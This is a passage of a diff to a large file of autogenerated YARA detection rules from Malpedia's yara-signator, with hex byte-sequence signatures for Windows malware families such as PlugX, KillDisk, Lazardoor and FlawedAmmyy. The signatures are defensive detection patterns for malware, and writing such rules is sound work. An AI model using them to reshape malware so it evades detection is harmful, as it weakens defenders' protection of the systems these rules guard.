+		$sequence_4 = { e8???????? 85c0 0f84ff010000 6a00 8bc8 e8???????? 8bf8 }
+		$sequence_5 = { d1ff 8bc7 897584 89bd6cffffff c7459c00000000 c7458c70105000 251f000080 }
+		$sequence_6 = { e8???????? 8bb570ffffff 8a03 03f7 ff8578ffffff 8807 803e00 }
+		$sequence_7 = { 8d4e10 e8???????? 83f803 0f86f3000000 0f57c0 c745ec00000000 8d4dd4 }
+		$sequence_8 = { e9???????? 3c13 7516 6893000000 68ce000000 8bce e8???????? }
+		$sequence_9 = { 8bec 57 8b7d08 8b4708 85c0 7503 5f }
 
 	condition:
-		7 of them and filesize < 1045504
+		7 of them and filesize < 2930688
 }
-rule MALPEDIA_Win_Graphite_Auto : FILE
+rule MALPEDIA_Win_Lazardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc"
+		id = "277a5926-2173-548c-847c-f39b2e42e95f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphite_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazardoor_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f"
+		logic_hash = "7e853d80ccef3940e80ec411ec3cf1794666e4d443e999ba85c896703eb74aa3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95695,32 +95875,32 @@ rule MALPEDIA_Win_Graphite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81e2ff030000 81e1bf030000 83c940 c1e10a }
-		$sequence_1 = { 7513 33d2 e8???????? 84c0 74e4 }
-		$sequence_2 = { 85db 7513 33d2 e8???????? }
-		$sequence_3 = { 7513 33d2 e8???????? 84c0 }
-		$sequence_4 = { 85db 7513 33d2 e8???????? 84c0 }
-		$sequence_5 = { 81e1bf030000 83c940 c1e10a 0bca }
-		$sequence_6 = { 33d2 e8???????? 84c0 74e4 }
-		$sequence_7 = { ff15???????? 33c0 eb05 b801010000 }
-		$sequence_8 = { 85db 7513 33d2 e8???????? 84c0 74e4 }
-		$sequence_9 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca }
+		$sequence_0 = { 7516 488d05530e0100 4a8b04e8 42385cf839 }
+		$sequence_1 = { 488bc8 e8???????? e8???????? 448bc0 c705????????62716365 b867666666 }
+		$sequence_2 = { 0fb60a 83e10f 4a0fbe841188a50100 428a8c1198a50100 482bd0 8b42fc }
+		$sequence_3 = { 410fb609 83e10f 4a0fbe843188a50100 428a8c3198a50100 4c2bc8 }
+		$sequence_4 = { 03d0 8d0492 2bc8 890d???????? 83fb05 0f82f5feffff ba5b540000 }
+		$sequence_5 = { 448d4304 488bce 488d542440 ff15???????? }
+		$sequence_6 = { 0f8531040000 4863693c 4803e9 817d0050450000 0f851d040000 8b5550 41b904000000 }
+		$sequence_7 = { e9???????? 41b880140000 488d1595560200 488d4c2440 e8???????? }
+		$sequence_8 = { 410fb6d3 4c8d0db3c90000 83f201 03d2 8bc2 }
+		$sequence_9 = { 8b1d???????? 41bcffff0000 85db 7440 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 405504
 }
-rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
+rule MALPEDIA_Win_Sagerunex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff725f8e-78d8-573e-b72f-f808485072b3"
+		id = "a425b22d-b4f2-5d55-8ad8-71f79a62d46d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nim_blackout_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sagerunex_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "8bcac4d517a5c0195b2a1f86c54202d4da8e70268566b060cf8dd1e9526230c9"
+		logic_hash = "dff18f54b10b1df23611f9090ec75c66093dde952c82cc96492b8dbdbdc0e627"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95734,32 +95914,32 @@ rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4510 488b4008 488b4018 488b4008 4889c2 b910000000 e8???????? }
-		$sequence_1 = { 84c0 7405 e8???????? 488b8570ffffff 488945f0 90 e9???????? }
-		$sequence_2 = { 488b4d10 e8???????? 488945b0 488b4510 488b00 480faf45e0 4889c1 }
-		$sequence_3 = { 0f9fc0 888583000000 0fb68583000000 83f001 84c0 0f85c2010000 488b85a0000000 }
-		$sequence_4 = { 488b45f0 4801d0 4883c010 c6002d eb1c 90 48c745d06c000000 }
-		$sequence_5 = { 488d0583c80100 488945d8 48c705????????00000000 48c745d040010000 488d0565c80100 488945d8 48c705????????00000000 }
-		$sequence_6 = { 488945d8 488d05d7fe0100 488945e8 48c745e000000000 66c745f00000 488d45d0 4889c1 }
-		$sequence_7 = { 48c705????????08000000 c605????????16 488d0522c40200 488905???????? 488d05b4fdffff 488905???????? c605????????01 }
-		$sequence_8 = { ba01000000 4889c1 488d45e8 488908 4889d0 83e001 84c0 }
-		$sequence_9 = { 7410 488b85a0000000 488b4038 488b00 eb05 b800000000 488b95a0000000 }
+		$sequence_0 = { e8???????? 488d83dcd70000 41b932000000 4c8bc6 33d2 33c9 c744242832000000 }
+		$sequence_1 = { c1c802 33c8 8bc3 23c7 0bf0 8d040a 8b0c24 }
+		$sequence_2 = { 49c1ea08 443378f4 48c1e910 440fb6c1 418bcb 478ba48650510400 48c1e908 }
+		$sequence_3 = { 448d6304 66894670 4d8bef 498bcd e8???????? 4883f832 }
+		$sequence_4 = { 448bc6 ba12000000 e8???????? 33f6 eb52 488d542430 e8???????? }
+		$sequence_5 = { 8bc5 81c19979825a 4123c2 034c240c 03d9 }
+		$sequence_6 = { 498b4e10 e8???????? 49896e08 4d896610 33d2 498bce e8???????? }
+		$sequence_7 = { 0fb6480f 440fb60c19 0fb6480e 0fb61419 0fb6480d 41c1e108 4433ca }
+		$sequence_8 = { 4c8d4728 4c8d4f10 488bd6 488bce 4889442420 e8???????? 85c0 }
+		$sequence_9 = { 488d542470 4c8bc0 458bcf ff15???????? 85c0 0f84a3000000 0fb7c6 }
 
 	condition:
-		7 of them and filesize < 1068032
+		7 of them and filesize < 619520
 }
-rule MALPEDIA_Win_Flash_Develop_Auto : FILE
+rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4688ecaa-1305-56f1-b990-d34d1967b3cd"
+		id = "557acb15-65a4-5ee1-85fd-aeddfe817272"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flash_develop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flash_develop_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vapor_rage_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "1b0b49a0bdf8cbe355d0f549d184abf36cc5a8a27ac3e4b70ddcdc76ec6e38f0"
+		logic_hash = "f25f99fbbd5c20118e31285e56e8f0280cb5b6b08bdd8f0f37cb8cec6e554ab7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95773,32 +95953,32 @@ rule MALPEDIA_Win_Flash_Develop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 56 33c9 57 0fb68170034200 99 8bf0 }
-		$sequence_1 = { 33fa 0fa4f708 c1e608 8934cd40484800 99 }
-		$sequence_2 = { c78424c8020000e0b04600 c78424cc02000068df4600 c78424d0020000b40d4700 c78424d4020000503e4700 c78424d8020000446e4700 c78424dc0200000c9d4700 c78424e0020000b0cc4700 }
-		$sequence_3 = { 891ccd28184800 892ccd2c184800 0fa4f710 c1e610 33f0 33fa 0fa4f708 }
-		$sequence_4 = { 33fa c1e308 892ccd2c204800 8bef 0fa4f708 891ccd28204800 8bde }
-		$sequence_5 = { 893ccd44484800 8bf0 8bfa 0fa4f708 }
-		$sequence_6 = { 892ccd34204800 8bef 0fa4f708 33fa 891ccd30204800 8bde c1e608 }
-		$sequence_7 = { c7842464010000240a4200 c7842468010000043a4200 c784246c01000070694200 c7842470010000cc9a4200 }
-		$sequence_8 = { 0fb68170054200 33ea 0fa4dd10 33fa 99 8934cd28304800 }
-		$sequence_9 = { 893ccd44404800 83c104 81f900010000 0f8c39f8ffff 5f 5e 5d }
+		$sequence_0 = { 8b55f8 81ca80000000 8955f8 6a04 }
+		$sequence_1 = { 52 8b45e8 50 e8???????? 83c408 ff65e8 8b4de4 }
+		$sequence_2 = { f27502 f2c3 f2e94e030000 55 }
+		$sequence_3 = { f2c3 f2e94e030000 55 8bec }
+		$sequence_4 = { 8945a4 8b55d4 52 e8???????? 83c404 }
+		$sequence_5 = { c745f004000000 8d4df0 51 8d55f8 52 }
+		$sequence_6 = { ff15???????? eb1e 8b4de4 51 ff15???????? }
+		$sequence_7 = { 746c 830d????????04 c705????????02000000 a900000008 7454 a9???????? }
+		$sequence_8 = { ff15???????? 8b4df8 81c900010000 894df8 }
+		$sequence_9 = { 32db 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 1111040
+		7 of them and filesize < 296960
 }
-rule MALPEDIA_Win_Killdisk_Auto : FILE
+rule MALPEDIA_Win_Unidentified_053_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7be3786-7785-5fb7-a02c-f300fdd3ab5d"
+		id = "44778796-93f3-5879-994d-5e3e2324b3e0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.killdisk_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_053_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "86f639bc00ee029db28c18aca620f57e9d7c8d6a5978a5c4489b1ba8c9e4159d"
+		logic_hash = "0ba9fcbf3221aa7fe9aa16ac81cd13a3c2e0b0b30a12bf9f5e09619187f5d921"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95812,40 +95992,34 @@ rule MALPEDIA_Win_Killdisk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bf3 8bd6 741c 2bee 57 8bff }
-		$sequence_1 = { 881438 e8???????? 9c c6442408cf }
-		$sequence_2 = { 0f89bc010000 60 9c 8f44241c c64424148e c644240426 e8???????? }
-		$sequence_3 = { e8???????? 9c 8f442420 ff3424 ff742424 8f4500 9c }
-		$sequence_4 = { 8b8c24d41a0000 5f 5e 5b }
-		$sequence_5 = { 83c10f 836c242001 894c2410 0f85f8feffff 8b6c2428 }
-		$sequence_6 = { 8be5 5d c20400 8b4804 8b30 }
-		$sequence_7 = { ff15???????? 3c05 0f85f8010000 b9???????? e8???????? }
-		$sequence_8 = { e9???????? ff742404 66894500 886c2408 9c }
-		$sequence_9 = { 50 51 e8???????? 4e 80fcd7 }
-		$sequence_10 = { ff15???????? e9???????? 83f810 0f8461ffffff 3d01010000 }
-		$sequence_11 = { 5e e8???????? 66ffc6 e8???????? }
-		$sequence_12 = { 50 8d642434 e9???????? 660fbcc3 660fa5e0 8b4500 }
-		$sequence_13 = { c604243a 9c 8d642434 e9???????? 883424 }
-		$sequence_14 = { 85f6 74f6 8bfe e8???????? 8b4314 }
-		$sequence_15 = { 33c0 89442404 89442408 8944240c 8d442408 }
+		$sequence_0 = { 0f857afeffff 393cb500924100 742e a1???????? 8d70ff 85f6 }
+		$sequence_1 = { 0fb6bdb0fffcff c1e208 0bd7 03d0 2bca 6a00 }
+		$sequence_2 = { 754d 53 57 8d3c85a8914100 833f00 bb00100000 7520 }
+		$sequence_3 = { 7e13 8d048dfc914100 3938 7408 4a }
+		$sequence_4 = { 8a6e1b 0fb64619 0fb67df4 8a4e1a }
+		$sequence_5 = { 81e9003ca875 87d6 4e 46 87d6 81c1003ca875 }
+		$sequence_6 = { 0fb6d2 f6820194410004 7406 8b10 41 }
+		$sequence_7 = { c1c719 e8???????? 87f2 e8???????? 2bd5 }
+		$sequence_8 = { 891d???????? 4a 87d6 8915???????? 03f7 46 893d???????? }
+		$sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 }
 
 	condition:
-		7 of them and filesize < 10817536
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Plugx_Auto : FILE
+rule MALPEDIA_Win_Polyglotduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3f86c5a3-fd23-59bc-bcb0-3d1decf01c2c"
+		id = "9c18a5b0-9646-54de-84d3-631d8bf608b5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plugx_auto.yar#L1-L291"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyglotduke_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "15190bb8aae3c81242a3f62c3118fe86de191513b0096b3d3022dcd142f4bd88"
+		logic_hash = "6e964f854be862afb1ae59446d85c2642af462845dbac22a50b518391d708853"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95857,55 +96031,32 @@ rule MALPEDIA_Win_Plugx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 56 57 6a1c 8bf8 e8???????? 8bf0 }
-		$sequence_1 = { 41 3bca 7ce0 3bca }
-		$sequence_2 = { 56 8b750c 8b4604 050070ffff }
-		$sequence_3 = { 33d2 f7f3 33d2 8945fc }
-		$sequence_4 = { 55 8bec 8b450c 81780402700000 }
-		$sequence_5 = { 51 53 6a00 6a00 6a02 ffd0 85c0 }
-		$sequence_6 = { 0145f4 8b45fc 0fafc3 33d2 }
-		$sequence_7 = { 50 ff15???????? a3???????? 8b4d18 }
-		$sequence_8 = { e8???????? 3de5030000 7407 e8???????? }
-		$sequence_9 = { e8???????? 85c0 7508 e8???????? 8945fc }
-		$sequence_10 = { 85c0 7413 e8???????? 3de5030000 }
-		$sequence_11 = { e8???????? 85c0 7407 b84f050000 }
-		$sequence_12 = { 6a00 6a00 6a04 6a00 6a01 6800000040 57 }
-		$sequence_13 = { e8???????? 85c0 750a e8???????? 8945fc }
-		$sequence_14 = { 85c0 750d e8???????? 8945f4 }
-		$sequence_15 = { 51 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 }
-		$sequence_16 = { 6819000200 6a00 6a00 6a00 51 }
-		$sequence_17 = { 57 e8???????? eb0c e8???????? }
-		$sequence_18 = { 81ec90010000 e8???????? e8???????? e8???????? }
-		$sequence_19 = { 68???????? e8???????? 6800080000 68???????? e8???????? }
-		$sequence_20 = { 50 56 ffb42480000000 ff15???????? }
-		$sequence_21 = { 89742434 89f1 8b442434 e8???????? }
-		$sequence_22 = { 89442424 8b442424 6808020000 6a00 }
-		$sequence_23 = { 6a02 6a00 e8???????? c705????????00000000 }
-		$sequence_24 = { 5d c21000 55 53 57 56 83ec18 }
-		$sequence_25 = { 6a00 6a00 6a01 6a00 e8???????? a3???????? 6800080000 }
-		$sequence_26 = { 6808020000 6a00 ff74242c e8???????? 83c40c }
-		$sequence_27 = { 50 ff75e8 6802000080 e8???????? }
-		$sequence_28 = { 50 6802000080 53 e8???????? }
-		$sequence_29 = { 68000000a0 6aff ffb424c8000000 ff74241c }
-		$sequence_30 = { 6808020000 6a00 ff74245c e8???????? }
-		$sequence_31 = { 6a5c ff74241c e8???????? 83c408 }
-		$sequence_32 = { 5e 5f 5b 5d c20400 50 64a118000000 }
+		$sequence_0 = { 4889442428 33d2 897dc0 4c89642420 ff15???????? 85c0 }
+		$sequence_1 = { 488d15804e0000 488bce 488905???????? ff15???????? 488bc8 ff15???????? 4c8bd8 }
+		$sequence_2 = { eb05 be04000000 488b4c2450 ff15???????? 488b4c2458 ff15???????? }
+		$sequence_3 = { 488bd8 4883f8ff 744d 488bc8 ff15???????? 488bcb 85c0 }
+		$sequence_4 = { eb0e 498bd7 488bcb e8???????? 488bf8 4d85ff 7408 }
+		$sequence_5 = { ff15???????? 4863f0 85c0 74d6 }
+		$sequence_6 = { 83f801 750e 498bd5 488bcf e8???????? 488be8 }
+		$sequence_7 = { 33c0 eb56 8364242800 488364242000 4c8bc1 b9e9fd0000 4183c9ff }
+		$sequence_8 = { 488bcb ba01000000 e8???????? 4c897c2438 4c897c2430 448bce }
+		$sequence_9 = { 4889742410 57 4881ec10010000 488b05???????? 4833c4 }
 
 	condition:
-		7 of them and filesize < 1284096
+		7 of them and filesize < 222784
 }
-rule MALPEDIA_Win_Wastedloader_Auto : FILE
+rule MALPEDIA_Win_Maggie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9b391e1-a439-5c84-8bc6-d01e7837fa3f"
+		id = "0ba792f1-dd78-5b98-8593-543560b6dc1a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wastedloader_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maggie_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "f52a5046711dc64fff342d42959b67fac6d384f1f957f74196d547273f13eb4f"
+		logic_hash = "f79cbc6ae2d70c9e6484e5066353afb6506cea51f8ea75e10ee4458493abfd34"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95919,32 +96070,32 @@ rule MALPEDIA_Win_Wastedloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7444 eb00 686bb90000 ff15???????? }
-		$sequence_1 = { 7ed7 7488 09b31ced6185 1ce2 }
-		$sequence_2 = { e8???????? 3d1e050000 c10147 833b38 }
-		$sequence_3 = { a828 b409 1c04 e8???????? }
-		$sequence_4 = { 7aec e471 e8???????? 0057bb 038919fc885d e479 }
-		$sequence_5 = { b9b5000000 8b55f8 66894a4c 8b45f8 }
-		$sequence_6 = { 8b45f8 66895056 b9b8000000 8b55f8 66894a58 8b45f8 0fb74858 }
-		$sequence_7 = { 0200 00e7 aa 53 }
-		$sequence_8 = { 2cbe 832061 5b 5b }
-		$sequence_9 = { 8b55f8 0fb7421e 83e854 8b4df8 6689411e ba86000000 }
+		$sequence_0 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? }
+		$sequence_1 = { 663b05???????? 7505 e8???????? e8???????? }
+		$sequence_2 = { 663b05???????? 7505 e8???????? e8???????? 84c0 }
+		$sequence_3 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 }
+		$sequence_4 = { 750f ff15???????? 2d33270000 f7d8 }
+		$sequence_5 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 }
+		$sequence_6 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 }
+		$sequence_7 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 }
+		$sequence_8 = { 750f ff15???????? 2d33270000 f7d8 1bc0 }
+		$sequence_9 = { b8ff000000 663b05???????? 7505 e8???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 2677760
+		7 of them and filesize < 611328
 }
-rule MALPEDIA_Win_Metadatabin_Auto : FILE
+rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d06dd743-35cf-5bb7-aeb8-d54914ce18a9"
+		id = "991ba939-2d9f-52cd-813d-6925dfb8d9c9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.metadatabin_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gold_dragon_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "6937a202ef9f0a455ba922507557ae6df15b8a9ec19545fd7cb48a075af80798"
+		logic_hash = "1d3ddf008eb509566d50c074a1778063d25aa540d5f914350cb60f472b9c159b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95958,34 +96109,34 @@ rule MALPEDIA_Win_Metadatabin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45f0 894708 f20f1045e8 f20f1107 e8???????? 6a0c 6a00 }
-		$sequence_1 = { 8d4aff 84c0 79dd 39f9 c745ec00000000 74bd 0fb65afe }
-		$sequence_2 = { 8b542468 0fa4fe0d 21842400030000 0fa4cb0d 8b842498000000 8bbc2440020000 89b424e0020000 }
-		$sequence_3 = { 8b7df0 8b5de4 83fa08 725e 8d72f8 39f1 8975e0 }
-		$sequence_4 = { e8???????? b901000000 31d2 e9???????? 8b442418 89742430 895c2434 }
-		$sequence_5 = { c784246605000000000000 c784246a05000000000000 c784246e05000000000000 c784247205000000000000 c784247605000000000000 c784247a05000000000000 c684247e05000000 }
-		$sequence_6 = { f20f115014 f20f11481c 837e4c00 0f85f4010000 e9???????? 8b4c2450 8b542460 }
-		$sequence_7 = { 8d4e2c e8???????? eb08 8d4e20 e8???????? 8b465c 85c0 }
-		$sequence_8 = { 8b542438 c104240c 89442464 8b442408 c144246410 339424e4000000 338424a0000000 }
-		$sequence_9 = { f00fc106 83e0c0 83f840 750e 8b4614 56 89d7 }
+		$sequence_0 = { 8890e0924000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff }
+		$sequence_1 = { 8bc8 83e01f c1f905 8d04c0 8b0c8d00954000 8d44810c 50 }
+		$sequence_2 = { 85c0 a3???????? 0f84ad060000 8b35???????? 68???????? }
+		$sequence_3 = { 8bf1 8bc1 c1fe05 83e01f 8b34b500954000 8d04c0 8b0486 }
+		$sequence_4 = { 41 8079ff00 0f8547ffffff 8bc6 8088e193400008 }
+		$sequence_5 = { 8d8560ffffff 68???????? 50 e8???????? ffb64c834000 8d8560ffffff 50 }
+		$sequence_6 = { 51 ffd6 85c0 a3???????? 0f84dd030000 8b15???????? }
+		$sequence_7 = { 50 ffd6 85c0 a3???????? 0f8478060000 }
+		$sequence_8 = { 83e01f 8b0c8d00954000 8d04c0 8d0481 8b4dfc }
+		$sequence_9 = { 68???????? 50 ffd6 85c0 a3???????? 0f84d8050000 8b0d???????? }
 
 	condition:
-		7 of them and filesize < 1263616
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Comebacker_Auto : FILE
+rule MALPEDIA_Win_Flawedammyy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "19b11e1a-a1ff-5098-8869-502d6ab34aa7"
+		id = "869ded56-7b9a-5ec5-b348-fd92c863b7a6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.comebacker_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flawedammyy_auto.yar#L1-L306"
 		license_url = "N/A"
-		logic_hash = "e448a9fe85529eabd811145723dc68a4c09b7b0e6109ed9890120aa2245173a6"
+		logic_hash = "1cd6d61d60d4c415e6c8e37367c9ce0c64744bcdc60e8edfc1af0f4b4c964dec"
 		score = 75
-		quality = 75
+		quality = 33
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95997,37 +96148,54 @@ rule MALPEDIA_Win_Comebacker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6683f809 7f04 0430 eb02 }
-		$sequence_1 = { 4c8d0556b10300 41b9dc000000 8d4af2 e8???????? }
-		$sequence_2 = { 741e 488bce 488bc6 488d15bf350600 83e11f 48c1f805 }
-		$sequence_3 = { 493b16 7429 c744242074010000 babb000000 4c8d0df6e20300 }
-		$sequence_4 = { 668945dd 8845df 66899d20060000 e8???????? }
-		$sequence_5 = { 488b742478 48895c2468 4c8bc8 488b842408010000 4889442460 8b8424f8000000 }
-		$sequence_6 = { eb22 c7442420ff000000 41b868000000 ba77000000 4c8d0d79f50300 }
-		$sequence_7 = { f2ae 48f7d1 488d79ff 488b8c24e0000000 }
-		$sequence_8 = { 83ec44 a1???????? 33c5 8945fc 8b4508 8d55dc }
-		$sequence_9 = { 7409 8d04c516d70410 eb23 f6c30c 7409 8d04c514d70410 }
-		$sequence_10 = { e8???????? 83c408 8945f8 8b4514 85c0 7416 8d4dec }
-		$sequence_11 = { 42 52 56 50 a3???????? }
-		$sequence_12 = { 81e7ff000000 8b1cbd38580410 33cb 8b5e08 33cb 33db 8ade }
-		$sequence_13 = { 2bc2 6a21 a3???????? e8???????? 83c404 8bf8 33f6 }
-		$sequence_14 = { 8d95fcf7ffff 68???????? 52 ffd7 8d85fcf7ffff 83c408 8d5002 }
+		$sequence_0 = { 50 ffd7 8d85fcfeffff 50 8d85ccf2ffff 68???????? }
+		$sequence_1 = { 0022 8a4200 828a4200bb8a42 00ff }
+		$sequence_2 = { 004bbf 42 0062bf 42 }
+		$sequence_3 = { 8d85bcfdffff 50 ffd3 8b45fc }
+		$sequence_4 = { 8d8548ffffff 6a00 50 660fd645ac 660fd645b4 e8???????? }
+		$sequence_5 = { 68???????? 6a00 6a00 ff15???????? 8b3d???????? 6830750000 ffd7 }
+		$sequence_6 = { 66898534ffffff ffd7 85c0 750f 68???????? ffd7 }
+		$sequence_7 = { 0000 0404 0404 0404 0401 }
+		$sequence_8 = { 00b3854200e5 854200 37 864200 }
+		$sequence_9 = { 85c0 782d 8b7dfc 2b7df4 8b7514 037d08 6a00 }
+		$sequence_10 = { 0018 874200 58 874200 }
+		$sequence_11 = { 0039 e342 0048e3 42 }
+		$sequence_12 = { ff15???????? 85c0 0f885e010000 6a00 6a00 6a00 }
+		$sequence_13 = { 002a e342 0039 e342 }
+		$sequence_14 = { ff75fc ff15???????? 85c0 740c 68???????? }
+		$sequence_15 = { 0062bf 42 0079bf 42 }
+		$sequence_16 = { 59 8945c4 eb17 68???????? 56 }
+		$sequence_17 = { 8b04855c303400 c1e002 50 6a40 ff15???????? 8906 43 }
+		$sequence_18 = { e9???????? 895df4 8d41de 33db 83f855 0f872affffff 0fb6805a213400 }
+		$sequence_19 = { ff248580233400 832700 e9???????? 55 e8???????? eb1a 55 }
+		$sequence_20 = { ff15???????? 8b45f0 395d08 88987830ca01 0f8484010000 ff75fc }
+		$sequence_21 = { ff75fc e8???????? f6450801 7412 }
+		$sequence_22 = { ff15???????? 8b4dc8 03ce 3bc1 761f 6aff ff75a8 }
+		$sequence_23 = { e8???????? 8b4d08 8a0408 a2???????? eb07 c605????????00 c705????????4c403400 }
+		$sequence_24 = { 83f907 0f8781000000 ff248dfd243400 881f eb76 }
+		$sequence_25 = { 5e 5b c3 55 8bec 81ec5c040000 53 }
